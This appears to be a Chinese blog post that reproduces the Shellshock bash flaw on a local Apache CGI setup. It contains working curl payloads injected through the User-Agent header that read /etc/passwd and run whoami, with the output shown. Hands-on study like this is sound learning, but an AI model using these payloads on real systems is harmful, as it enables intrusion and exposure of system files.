Bash shock 安全漏洞
昨天从微信上面,看到朋友发的最新的 bash 漏洞信息,感觉真的很可怕,现在互联网公司几乎都有使用到 bash。现在我来带领大家实践一下使用这个漏洞的过程。
使 Apache 支持 Bash CGI
首先要确认 Apache 里面的 CGI 模块已经被载入 在 httpd.conf 里面有一句:LoadModule cgi_module modules/mod_cgi.so
这个必须有,然后搜索 cgi-bin 如果没有的话添加一段 ScriptAlias /cgi-bin/ "/var/www/cgi-bin"
测试 bash cgi Hello world
编辑文件:$ vim /var/www/cgi-bin/hello.cgi
#!/bin/bash
echo Content-type: text/html
echo ""
echo Hello, world.
执行以下命令:
$ chmod 755 /var/www/cgi-bin/hello.cgi`
$ curl localhost/cgi-bin/hello.cgi
输出以下内容则代表Apache已经支持CGI了,就可以继续我们下面的测试
Hello, world.
最可怕的测试
$ curl -A "() { :; }; echo ; /bin/cat /etc/passwd" http://localhost/cgi-bin/hello.cgi
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
... ...
$ curl -A "() { :; }; echo ; /usr/bin/whoami" http://localhost/cgi-bin/hello.cgi
apache
有牛人对这个漏洞进行了分析,本人表示看不懂,可以看一下 Bash 3.0-4.3命令执行漏洞分析(by@知道创宇 lu4nx)
modifyed